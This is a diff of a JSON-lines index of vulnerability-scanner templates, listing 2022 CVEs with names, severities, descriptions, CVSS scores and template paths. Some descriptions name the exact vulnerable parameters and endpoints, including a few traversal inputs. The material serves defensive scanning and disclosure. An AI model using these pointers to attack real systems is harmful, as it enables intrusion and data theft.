arbitrary file upload vulnerability via the File Manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-38296.yaml"} {"ID":"CVE-2022-38463","Info":{"Name":"ServiceNow - Cross-Site Scripting","Severity":"medium","Description":"ServiceNow through San Diego Patch 4b and Patch 6 contains a cross-site scripting vulnerability in the logout functionality, which can enable an unauthenticated remote attacker to execute arbitrary JavaScript.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-38463.yaml"} -{"ID":"CVE-2022-38467","Info":{"Name":"CRM Perks Forms \u003c 1.1.1 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters from a sample file before outputting them back in the page, leading to Reflected Cross-Site Scripting\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-38467.yaml"} +{"ID":"CVE-2022-38467","Info":{"Name":"CRM Perks Forms \u003c 1.1.1 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters from a sample file before outputting them back in the page, leading to Reflected Cross-Site Scripting\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-38467.yaml"} {"ID":"CVE-2022-38553","Info":{"Name":"Academy Learning Management System \u003c5.9.1 - Cross-Site Scripting","Severity":"medium","Description":"Academy Learning Management System before 5.9.1 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-38553.yaml"} {"ID":"CVE-2022-38637","Info":{"Name":"Hospital Management System 1.0 - SQL Injection","Severity":"critical","Description":"Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/user-login.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-38637.yaml"} {"ID":"CVE-2022-38794","Info":{"Name":"Zaver - Local File Inclusion","Severity":"high","Description":"Zaver through 2020-12-15 is vulnerable to local file inclusion via the GET /.. substring.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-38794.yaml"} {"ID":"CVE-2022-38817","Info":{"Name":"Dapr Dashboard 0.1.0-0.10.0 - Improper Access Control","Severity":"high","Description":"Dapr Dashboard 0.1.0 through 0.10.0 is susceptible to improper access control. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-38817.yaml"} {"ID":"CVE-2022-38870","Info":{"Name":"Free5gc 3.2.1 - Information Disclosure","Severity":"high","Description":"Free5gc 3.2.1 is susceptible to information disclosure. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-38870.yaml"} +{"ID":"CVE-2022-39048","Info":{"Name":"ServiceNow - Cross-site Scripting","Severity":"medium","Description":"A XSS vulnerability was identified in the ServiceNow UI page assessment_redirect. To exploit this vulnerability, an attacker would need to persuade an authenticated user to click a maliciously crafted URL. Successful exploitation potentially could be used to conduct various client-side attacks, including, but not limited to, phishing, redirection, theft of CSRF tokens, and use of an authenticated user's browser or session to attack other systems.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-39048.yaml"} {"ID":"CVE-2022-3908","Info":{"Name":"WordPress Helloprint \u003c1.4.7 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Helloprint plugin before 1.4.7 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-3908.yaml"} {"ID":"CVE-2022-39195","Info":{"Name":"LISTSERV 17 - Cross-Site Scripting","Severity":"medium","Description":"LISTSERV 17 web interface contains a cross-site scripting vulnerability. An attacker can inject arbitrary JavaScript or HTML via the \"c\" parameter, thereby possibly allowing the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-39195.yaml"} {"ID":"CVE-2022-3933","Info":{"Name":"WordPress Essential Real Estate \u003c3.9.6 - Authenticated Cross-Site Scripting","Severity":"medium","Description":"WordPress Essential Real Estate plugin before 3.9.6 contains an authenticated cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters, which can allow someone with a role as low as admin to inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow theft of cookie-based authentication credentials and launch of other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-3933.yaml"} @@ -1720,14 +1834,22 @@ {"ID":"CVE-2022-3982","Info":{"Name":"WordPress Booking Calendar \u003c3.2.2 - Arbitrary File Upload","Severity":"critical","Description":"WordPress Booking Calendar plugin before 3.2.2 is susceptible to arbitrary file upload possibly leading to remote code execution. The plugin does not validate uploaded files, which can allow an attacker to upload arbitrary files, such as PHP, and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-3982.yaml"} {"ID":"CVE-2022-39952","Info":{"Name":"Fortinet FortiNAC - Arbitrary File Write","Severity":"critical","Description":"Fortinet FortiNAC is susceptible to arbitrary file write. An external control of the file name or path can allow an attacker to execute unauthorized code or commands via specifically crafted HTTP request, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. Affected versions are 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, and 8.3.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-39952.yaml"} {"ID":"CVE-2022-39960","Info":{"Name":"Jira Netic Group Export \u003c1.0.3 - Missing Authorization","Severity":"medium","Description":"Jira Netic Group Export add-on before 1.0.3 contains a missing authorization vulnerability. The add-on does not perform authorization checks, which can allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-39960.yaml"} +{"ID":"CVE-2022-39986","Info":{"Name":"RaspAP 2.8.7 - Unauthenticated Command Injection","Severity":"critical","Description":"A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-39986.yaml"} {"ID":"CVE-2022-40022","Info":{"Name":"Symmetricom SyncServer Unauthenticated - Remote Command Execution","Severity":"critical","Description":"Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-40022.yaml"} +{"ID":"CVE-2022-40032","Info":{"Name":"Simple Task Managing System v1.0 - SQL Injection","Severity":"critical","Description":"SQL injection occurs when a web application doesn't properly validate or sanitize user input that is used in SQL queries. Attackers can exploit this by injecting malicious SQL code into the input fields of a web application, tricking the application into executing unintended database queries.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-40032.yaml"} +{"ID":"CVE-2022-40047","Info":{"Name":"Flatpress \u003c v1.2.1 - Cross Site Scripting","Severity":"medium","Description":"Flatpress v1.2.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the page parameter at /flatpress/admin.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-40047.yaml"} {"ID":"CVE-2022-40083","Info":{"Name":"Labstack Echo 4.8.0 - Open Redirect","Severity":"critical","Description":"Labstack Echo 4.8.0 contains an open redirect vulnerability via the Static Handler component. An attacker can leverage this vulnerability to cause server-side request forgery, making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2022/CVE-2022-40083.yaml"} +{"ID":"CVE-2022-40127","Info":{"Name":"AirFlow \u003c 2.4.0 - Remote Code Execution","Severity":"high","Description":"A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-40127.yaml"} {"ID":"CVE-2022-40359","Info":{"Name":"Kae's File Manager \u003c=1.4.7 - Cross-Site Scripting","Severity":"medium","Description":"Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-40359.yaml"} +{"ID":"CVE-2022-4049","Info":{"Name":"WP User \u003c= 7.0 - Unauthenticated SQLi","Severity":"critical","Description":"The WP User WordPress plugin through 7.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4049.yaml"} {"ID":"CVE-2022-4050","Info":{"Name":"WordPress JoomSport \u003c5.2.8 - SQL Injection","Severity":"critical","Description":"WordPress JoomSport plugin before 5.2.8 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4050.yaml"} +{"ID":"CVE-2022-4057","Info":{"Name":"Autoptimize \u003c 3.1.0 - Information Disclosure","Severity":"medium","Description":"The Autoptimize WordPress plugin before 3.1.0 uses an easily guessable path to store plugin's exported settings and logs.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-4057.yaml"} +{"ID":"CVE-2022-4059","Info":{"Name":"Cryptocurrency Widgets Pack \u003c 2.0 - SQL Injection","Severity":"critical","Description":"The plugin does not sanitise and escape some parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4059.yaml"} {"ID":"CVE-2022-4060","Info":{"Name":"WordPress User Post Gallery \u003c=2.19 - Remote Code Execution","Severity":"critical","Description":"WordPress User Post Gallery plugin through 2.19 is susceptible to remote code execution. The plugin does not limit which callback functions can be called by users, making it possible for an attacker execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4060.yaml"} {"ID":"CVE-2022-4063","Info":{"Name":"WordPress InPost Gallery \u003c2.1.4.1 - Local File Inclusion","Severity":"critical","Description":"WordPress InPost Gallery plugin before 2.1.4.1 is susceptible to local file inclusion. The plugin insecurely uses PHP's extract() function when rendering HTML views, which can allow attackers to force inclusion of malicious files and URLs. This, in turn, can enable them to execute code remotely on servers.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4063.yaml"} {"ID":"CVE-2022-40684","Info":{"Name":"Fortinet - Authentication Bypass","Severity":"critical","Description":"Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-40684.yaml"} {"ID":"CVE-2022-40734","Info":{"Name":"Laravel Filemanager v2.5.1 - Local File Inclusion","Severity":"medium","Description":"Laravel Filemanager (aka UniSharp) through version 2.5.1 is vulnerable to local file inclusion via download?working_dir=%2F.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2022/CVE-2022-40734.yaml"} +{"ID":"CVE-2022-40843","Info":{"Name":"Tenda AC1200 V-W15Ev2 - Authentication Bypass","Severity":"medium","Description":"The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console.\n","Classification":{"CVSSScore":"4.9"}},"file_path":"http/cves/2022/CVE-2022-40843.yaml"} {"ID":"CVE-2022-40879","Info":{"Name":"kkFileView 4.1.0 - Cross-Site Scripting","Severity":"medium","Description":"kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the errorMsg parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-40879.yaml"} {"ID":"CVE-2022-40881","Info":{"Name":"SolarView 6.00 - Remote Command Execution","Severity":"critical","Description":"SolarView Compact 6.00 is vulnerable to a command injection via network_test.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-40881.yaml"} {"ID":"CVE-2022-4117","Info":{"Name":"WordPress IWS Geo Form Fields \u003c=1.0 - SQL Injection","Severity":"critical","Description":"WordPress IWS Geo Form Fields plugin through 1.0 contains a SQL injection vulnerability. The plugin does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4117.yaml"} @@ -1744,134 +1866,340 @@ {"ID":"CVE-2022-42747","Info":{"Name":"CandidATS 3.0.0 - Cross-Site Scripting.","Severity":"medium","Description":"CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortBy parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-42747.yaml"} {"ID":"CVE-2022-42748","Info":{"Name":"CandidATS 3.0.0 - Cross-Site Scripting.","Severity":"medium","Description":"CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortDirection parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-42748.yaml"} {"ID":"CVE-2022-42749","Info":{"Name":"CandidATS 3.0.0 - Cross-Site Scripting","Severity":"medium","Description":"CandidATS 3.0.0 contains a cross-site scripting vulnerability via the page parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-42749.yaml"} +{"ID":"CVE-2022-4295","Info":{"Name":"Show all comments \u003c 7.0.1 - Cross-Site Scripting","Severity":"medium","Description":"The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4295.yaml"} {"ID":"CVE-2022-4301","Info":{"Name":"WordPress Sunshine Photo Cart \u003c2.9.15 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Sunshine Photo Cart plugin before 2.9.15 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4301.yaml"} {"ID":"CVE-2022-43014","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the joborderID parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-43014.yaml"} {"ID":"CVE-2022-43015","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the entriesPerPage parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-43015.yaml"} {"ID":"CVE-2022-43016","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the callback component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-43016.yaml"} {"ID":"CVE-2022-43017","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the indexFile component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-43017.yaml"} {"ID":"CVE-2022-43018","Info":{"Name":"OpenCATS 0.9.6 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the email parameter in the Check Email function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-43018.yaml"} +{"ID":"CVE-2022-4305","Info":{"Name":"Login as User or Customer \u003c 3.3 - Privilege Escalation","Severity":"critical","Description":"The plugin lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4305.yaml"} {"ID":"CVE-2022-4306","Info":{"Name":"WordPress Panda Pods Repeater Field \u003c1.5.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Panda Pods Repeater Field before 1.5.4 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. This can be leveraged against a user who has at least Contributor permission. An attacker can also steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-4306.yaml"} {"ID":"CVE-2022-43140","Info":{"Name":"kkFileView 4.1.0 - Server-Side Request Forgery","Severity":"high","Description":"kkFileView 4.1.0 is susceptible to server-side request forgery via the component cn.keking.web.controller.OnlinePreviewController#getCorsFile. An attacker can force the application to make arbitrary requests via injection of crafted URLs into the url parameter and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-43140.yaml"} +{"ID":"CVE-2022-43164","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking \"Add\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-43164.yaml"} +{"ID":"CVE-2022-43165","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"A stored cross-site scripting (XSS) vulnerability in the Global Variables feature (/index.php?module=global_vars/vars) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Value parameter after clicking \"Create\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-43165.yaml"} +{"ID":"CVE-2022-43166","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"A stored cross-site scripting (XSS) vulnerability in the Global Entities feature (/index.php?module=entities/entities) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking \"Add New Entity\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-43166.yaml"} +{"ID":"CVE-2022-43167","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking \"Add\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-43167.yaml"} +{"ID":"CVE-2022-43169","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross-Site Scripting","Severity":"medium","Description":"A stored cross-site scripting (XSS) vulnerability in the Users Access Groups feature (/index.php?module=users_groups/users_groups) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking \"Add New Group\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-43169.yaml"} +{"ID":"CVE-2022-43170","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"A stored cross-site scripting (XSS) vulnerability in the Dashboard Configuration feature (index.php?module=dashboard_configure/index) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking \"Add info block\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-43170.yaml"} +{"ID":"CVE-2022-43185","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross-Site Scripting","Severity":"medium","Description":"A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking \"Add\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-43185.yaml"} {"ID":"CVE-2022-4320","Info":{"Name":"WordPress Events Calendar \u003c1.4.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Events Calendar plugin before 1.4.5 contains multiple cross-site scripting vulnerabilities. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against both unauthenticated and authenticated users.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4320.yaml"} -{"ID":"CVE-2022-4321","Info":{"Name":"PDF Generator for WordPress \u003c 1.1.2 - Cross Site Scripting","Severity":"medium","Description":"The plugin includes a vendored dompdf example file which is susceptible to Reflected Cross-Site Scripting and could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-4321.yaml"} +{"ID":"CVE-2022-4321","Info":{"Name":"PDF Generator for WordPress \u003c 1.1.2 - Cross Site Scripting","Severity":"medium","Description":"The plugin includes a vendored dompdf example file which is susceptible to Reflected Cross-Site Scripting and could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4321.yaml"} {"ID":"CVE-2022-4325","Info":{"Name":"WordPress Post Status Notifier Lite \u003c1.10.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Post Status Notifier Lite plugin before 1.10.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4325.yaml"} {"ID":"CVE-2022-4328","Info":{"Name":"WooCommerce Checkout Field Manager \u003c 18.0 - Arbitrary File Upload","Severity":"critical","Description":"The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4328.yaml"} {"ID":"CVE-2022-43769","Info":{"Name":"Hitachi Pentaho Business Analytics Server - Remote Code Execution","Severity":"high","Description":"Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-43769.yaml"} +{"ID":"CVE-2022-44290","Info":{"Name":"WebTareas 2.4p5 - SQL Injection","Severity":"critical","Description":"webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in deleteapprovalstages.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-44290.yaml"} +{"ID":"CVE-2022-44291","Info":{"Name":"WebTareas 2.4p5 - SQL Injection","Severity":"critical","Description":"webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in phasesets.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-44291.yaml"} {"ID":"CVE-2022-4447","Info":{"Name":"WordPress Fontsy \u003c=1.8.6 - SQL Injection","Severity":"critical","Description":"WordPress Fontsy plugin through 1.8.6 is susceptible to SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4447.yaml"} {"ID":"CVE-2022-44877","Info":{"Name":"CentOS Web Panel 7 \u003c0.9.8.1147 - Remote Code Execution","Severity":"critical","Description":"CentOS Web Panel 7 before 0.9.8.1147 is susceptible to remote code execution via entering shell characters in the /login/index.php component. This can allow an attacker to execute arbitrary system commands via crafted HTTP requests and potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-44877.yaml"} +{"ID":"CVE-2022-44944","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Announcement function at /index.php?module=help_pages/pages\u0026entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44944.yaml"} +{"ID":"CVE-2022-44946","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross-Site Scripting","Severity":"medium","Description":"Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Page function at /index.php?module=help_pages/pages\u0026entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44946.yaml"} +{"ID":"CVE-2022-44947","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Highlight Row feature at /index.php?module=entities/listing_types\u0026entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Note field after clicking \"Add\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44947.yaml"} +{"ID":"CVE-2022-44948","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross-Site Scripting","Severity":"medium","Description":"Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Entities Group feature at/index.php?module=entities/entities_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field after clicking \"Add\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44948.yaml"} +{"ID":"CVE-2022-44949","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) 